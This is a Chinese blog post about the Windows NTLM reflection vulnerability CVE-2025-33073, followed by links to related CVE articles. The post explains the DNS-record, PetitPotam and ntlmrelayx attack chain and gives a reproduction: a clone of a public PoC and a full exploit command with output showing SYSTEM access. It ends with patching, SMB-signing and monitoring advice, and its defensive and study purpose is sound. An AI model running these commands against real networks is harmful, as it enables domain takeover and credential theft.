微软重大漏洞来袭! CVE-2025-33073漏洞引爆全球Windows AD域沦陷危机

最新推荐文章于 2025-06-28 15:16:23 发布
最新推荐文章于 2025-06-28 15:16:23 发布
阅读量666 收藏 10
点赞数 10
CC 4.0 BY-SA版权
分类专栏: windows 文章标签: microsoft windows CVE-2025-33073 AD域
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Hum0rp/article/details/148798573

⚠️ 漏洞核心风险,仅需普通域用户凭证,攻击者即可远程接管域内所有非域控主机,全域沦陷倒计时启动!

    漏洞关键点:

  1. 利用门槛极低

    普通域用户权限+未启用SMB签名的Windows主机(90%企业内网默认状态)。

  2. 攻击后果致命

    直接获取NT AUTHORITY\SYSTEM权限,可远程执行任意代码、导出SAM哈希、横向扩散。

  3. 影响范围广泛

    涵盖Windows Server 2008~2025Windows 10/11全版本(除域控外)。

    ⚡ 漏洞技术原理(精简版)

    攻击者通过恶意DNS记录+强制认证触发,绕过微软NTLM反射防护,实现权限跃升:

  1. DNS投毒

    注册特殊格式DNS记录(如srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA),指向攻击者IP。

  2. 强制认证

    利用PetitPotam工具强制lsass.exe(SYSTEM权限)向恶意服务器发起认证。

  3. 认证反射

    通过ntlmrelayx.py将认证中继回目标主机,触发本地NTLM认证缺陷,注入SYSTEM令牌。

  4. 权限收割

    借助高权限令牌远程导出SAM或执行命令(如添加后门)。

📌 致命缺陷
当DNS名称与机器名匹配时,系统误判为“本地认证”(NTLMSSP_NEGOTIATE_LOCAL_CALL),导致防护失效。

    🛠️ 模拟攻击复现(Kali环境)(本文模拟测试仅用于合法授权环境,严禁非法渗透)

    工具准备:

git clone https://github.com/mverschu/CVE-2025-33073  cd CVE-2025-33073  pip install -r requirements.txt  # 依赖:impacket, dnspython    

图片

图片

    一键攻击命令:

python3 CVE-2025-33073.py \    -u 'PowerShell\user01' \    # 普通域账号    -p 'password' \    --attacker-ip 192.168.178.49 \   # 攻击者IP    --dns-ip 192.168.178.138 \       # 域控制器IP    --dc-fqdn DC01.PowerShell.com.cn \  # 域控FQDN    --target CLIENT01.PowerShell.com.cn \ # 目标主机    --target-ip 192.168.178.65 \    --cli-only \                      # CLI模式    --custom-command "whoami"         # 执行命令(返回SYSTEM)成功标志:[*] Authenticating against smb://CLIENT01.PowerShell.com.cn as / SUCCEED  [*] Executing command: whoami  NT AUTHORITY\SYSTEM  # 确认权限提升成功!

    🛡️ 紧急处置建议

    1️⃣ 立即打补丁

  • 安装微软2025年6月补丁(KB5039211)。

  • 手动下载链接:

    2️⃣ 强制SMB签名(治本方案):

    组策略路径:  
    计算机配置 → 策略 → Windows设置 → 安全设置 → 本地策略 → 安全选项  
→ “Microsoft网络服务器: 对通信进行数字签名(始终)” → 启用

    3️⃣ 攻击面收敛

  • 禁用非必要RPC服务(如Print Spooler、EFSRPC): 
    sc.exe config Spooler start=disabled

  • 限制DNS记录修改权限,监控异常主机名注册。

    4️⃣ 深度监控

  • 审计事件ID 4624(登录)、4688(进程创建),捕捉PetitPotamntlmrelayx特征。

  • 部署网络层检测:扫描未签名SMB会话及畸形DNS查询(如超长A记录)。

    💎 总结

    CVE-2025-33073是近十年最具破坏力的Windows域渗透漏洞之一,其“低门槛+高权限”特性将导致企业内网面临“雪崩式沦陷”风险。补丁+SMB签名双管齐下是唯一根治方案,延迟修复等于为攻击者敞开大门!

Tomcat DOS漏洞复现(CVE-2025-31650)
iSee857的博客
04-30 1719
漏洞存在于对 HTTP 优先级头部(HTTP/2 Priority Headers) 的错误处理过程中。当接收到格式错误的优先级头部时,Tomcat 并未正确清理失败请求,造成内存泄漏。攻击者可发起大量恶意请求,最终耗尽内存资源并触发 OutOfMemoryException,导致服务不可用(拒绝服务攻击 DoS)(CVE-2025-31650)
【权限提升】Windows Server 2022 21H2 本地权限提升漏洞(PetitPotam)
李火火的安全圈
03-23 1488
Windows Server 2022 Standard/Datacenter 21H2 存在本地权限提升漏洞,攻击者可通过在受害主机上执行特定可执行程序并对普通用户权限提升至 nt authority system ,进而执行其他操作。
centos8的openssh9.9p2 RPM包,解决漏洞CVE-2025-26465 和 CVE-2025-26466
03-04
里面包含了升级包、升级注意事项等文件 openssh-9.9p2-1.el8.x86_64.rpm openssh-clients-9.9p2-1.el8.x86_64.rpm openssh-server-9.9p2-1.el8.x86_64.rpm centos8升级openssh9.9p2.docx
【内网渗透】也聊CVE-2025-33073 NTLM Reflection攻击
uuzeray的博客
06-19 1071
CVE-2025-33073 漏洞属于 NTLM Reflection(NTLM反射)攻击,而NTLM Reflection攻击是NTLM Relay(NTLM 中继)攻击的一种特殊形式,指的是将获得的受害者机器的NTLM认证请求重新反射回发送该请求的原始机器(即受害者机器)通过利用该漏洞,攻击者只要有任意权限的用户权限且目标机器不开启 SMB 签名就能远程命令执行,而在大部分情况下,SMB 签名默认只有控开,内机器大多数是不开的。进行强制触发,让目标机器向指定DNS记录进行NTLM认证。
漏洞分析 | CVE-2025-29927:Next.js 中间件授权绕过
zkaqlaoniao的博客
05-21 732
Next.js 是由 Vercel 开发的广受欢迎的 React 框架,它凭借无缝集成的服务器端渲染、静态生成和强大的中间件系统,驱动着数百万个 Web 应用程序。然而,在 2025 年 3 月,一个关键漏洞 CVE-2025-29927 震撼了整个生态系统。该漏洞暴露了一个缺陷,使攻击者能够轻易绕过基于中间件的安全控制。该问题由安全研究员 Rachid Allam(又名 zhero)发现,突显了 Next.js 中间件的强大与风险。让我们深入探讨该漏洞的技术细节、其工作原理以及对开发者的影响。中间件:隐藏
CVE-2025-33073 NTLM反射 权限提升漏洞复现
渗透之路,攻防之间皆学问
06-18 1840
CVE-2025-33073是一个高危Windows SMB客户端漏洞,可通过NTLM/Kerberos认证反射实现内SYSTEM权限提权。攻击者只需普通账号,在满足目标主机未强制SMB签名且DNS可被篡改的条件下,即可通过构造特殊DNS记录(如server11UWhRC...指向攻击机)、启动SMB中继服务(ntlmrelayx.py)和触发NTLM认证(PetitPotam)三个步骤,将认证反射回目标主机自身,最终获取SYSTEM权限。该漏洞影响所有未安装2025年6月补丁且未启用SMB签名的
漏洞复现】CVE-2025-33073Windows SMB 权限提升漏洞
最新发布
信安百科
06-28 246
CVE-2025-33073漏洞存在于Windows SMB中,允许已认证的远程攻击者在未经强制SMB签名的机器上,通过篡改DNS记录强制目标主机进行本地认证反射,最终以SYSTEM权限执行任意命令。
微软最新WiFi远程代码执行漏洞CVE-2024-30078)探究
小司机的奥拓
07-08 3523
微软在六月的安全更新中,修复了一个WiFi驱动的漏洞漏洞描述的攻击场景吸引了很多人的注意:在近源的场景下,攻击者通过发送WiFi数据包来发动攻击。这篇漏洞公告一石激起千层浪:‒ 有人声称以5000美元出售漏洞的PoC;‒ 国内技术论坛上对漏洞的讨论和猜测,如12;‒ 以及github上流传的各种假PoC。首推,被国内营销号各种转发。它一开始声称漏洞原因是SSID溢出,直到广大网友在issues中质疑无法复现,才承认自己只是在尝试复现漏洞,并删光了之前所谓对漏洞原理的描述。
CVE-2025-24813 漏洞全解析|Apache Tomcat 关键路径绕过与RCE
syg6921008的博客
04-06 3876
是 Apache Tomcat 中一个关键的路径等效性(Path Equivalence)漏洞,允许未经身份验证的远程攻击者在特定配置下实现远程代码执行(RCE)、读取敏感文件,甚至篡改文件内容。该漏洞已在野外被观察到存在实际利用行为,影响范围广泛。CVE-2025-24813 是一次典型的“路径+反序列化+配置缺陷”复合型漏洞,表面上源于文件路径处理缺陷,实际利用则依赖于多个错误配置的叠加效应。边界可信假设失效、中间件权限设置失误、反序列化引擎暴露等老问题,在现代系统中依旧构成致命威胁。
Apache Tomcat RCE漏洞复现(CVE-2025-24813)
ANGEEK181203的博客
04-14 967
例如 Content-Range: bytes 0-1000/1200 表示文件总大小是1200字节,本次上传的是前1001字节(0-1000),后续上传剩余部分(1001-1200)。使用 partial PUT 请求将恶意的序列化数据写入到会话文件中,在开启文件会话持久化(默认存储位置),并且在文件上传未完成的情况下,内容会被临时存储在 Tomcat 的工作目录work\Catalina\localhost\ROOT。2. 在conf/context.xml中,开启File文件会话存储。
渗透02-SYSVOL 漏洞 (MS14-025)
GalaxySpaceX的博客
04-27 921
SYSVOL 漏洞 (MS14-025)原理加利用
OpenSSH 漏洞 CVE-2025-26465 和 CVE-2025-26466 可引发中间人攻击和 DoS 攻击
技术超强的网络安全平台
04-27 793
2025年2月18日,广泛使用的安全网络实用程序套件OpenSSH中披露了两个严重漏洞。这两个漏洞分别被标识为和。
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
警惕!Windows 系统中的这个权限提升漏洞
weixin_43172311的博客
04-25 1240
Windows 通用日志文件系统,简称 CLFS,是在 Windows Vista 这个操作系统开始引入的一项技术。你可以把它想象成是一个超级厉害的“记账本”。平时我们的电脑在运行过程中,会有各种各样重要的事情发生,比如系统启动了、某个软件打开了、硬件出现了什么状况等等,这些就像是我们在生活中的日常事务。而 CLFS 就负责把这些事情详细地记录下来,方便以后查询和分析。和其他普通的记账方式比起来,CLFS 记录东西又快又不容易出错、卡顿,特别是在事情很多、需要记录大量信息的时候,它的优势就很明显啦。
Windows 远程桌面授权服务远程代码执行漏洞CVE-2024-38077)
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
08-10 8029
开启该服务(Windows 远程桌面授权服务)并且操作系统版本在受影响范围的 Windows Server 受影响,没有开启该服务但是操作系统版本在受影响范围的Windows Server 不受影响,Windows 10、Windows 11 等非 Server 版本的操作系统,不论是否开启Windows 远程桌面(RDS),均不受影响。这一漏洞存在于Windows远程桌面许可管理服务(RDL)中,该服务被广泛部署于开启Windows远程桌面(3389端口)的服务器,用于管理远程桌面连接许可。
OpenSSH CVE-2025-26466 漏洞解析与防御,从零基础到精通,收藏这篇就够了!
Libra1313的博客
03-17 1795
CVE-2025-26466 是一个影响 OpenSSH 的预身份验证拒绝服务(DoS)漏洞。它通过操纵 SSH 握手过程来消耗系统资源,导致系统崩溃或服务中断。
CVE-2025-21756:Linux内核微小漏洞如何引发完整Root提权攻击(含PoC发布)
FreeBuf_的博客
04-29 808
补丁分析指出:"传输重分配会触发vsock_remove_sock,进而调用vsock_remove_bound错误地减少vsock对象的引用计数器。通过用精心构造的管道缓冲区回收已释放的vsock套接字,并利用vsock_diag_dump作为侧信道,Hoefler暴力破解了有效的skc_net指针,从而绕过kASLR。攻击可劫持sk->sk_prot->close函数指针并转向ROP(面向返回编程)链:"我们最感兴趣的是对sk->sk_prot->close(sk, 0)的调用。
CVE-2025-30065 漏洞全解析|Apache Parquet 反序列化远程代码执行漏洞分析
syg6921008的博客
04-06 1496
漏洞编号影响组件:Apache Parquet(parquet-avro 模块)漏洞类型:反序列化漏洞(Unsafe Deserialization)危害等级:高危(CVSS 评分 ≥ 9.0)攻击向量:本地文件或远程数据载入(取决于使用场景)影响版本认证要求:无需认证,仅需触发反序列化逻辑修复版本:1.15.1发布日期:2025 年第一季度。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚拟化爱好者

创作不易

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值